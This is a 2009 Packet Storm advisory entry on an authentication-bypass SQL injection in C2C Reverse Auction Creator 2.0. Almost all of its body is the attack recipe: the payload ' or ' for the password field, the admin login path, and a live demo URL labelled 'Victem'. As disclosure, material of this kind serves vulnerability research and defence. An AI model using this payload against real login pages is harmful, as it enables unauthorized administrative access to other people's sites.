C2C Reverse Auction Creator 2.0 SQL Injection

2009-02-26T00:00:00
ID PACKETSTORM:75236
Type packetstorm
Reporter Pouya Server
Modified 2009-02-26T00:00:00

Description

                                        
                                            `#########################################################  
---------------------------------------------------------  
Portal Name: C2C Reverse Auction Creator  
Version: 2.0  
Vendor: http://www.etoshop.com  
Author : Pouya_Server , Pouya.s3rver@Gmail.com  
Website: http://Pouya-Server.ir  
Vulnerability : (Auth Bypass) SQL Injection Vulnerability  
---------------------------------------------------------  
#########################################################  
[Auth Bypass]:  
user: pouya  
pass: ' or '  
admin page : http://site.com/[path]/casp/admin.asp  
-----------------------------------  
Victem :  
http://www.etoshop.com/demo/C2CReverseAuction/reverse  
---------------------------------------------------------  
#########################################################  
  
  
`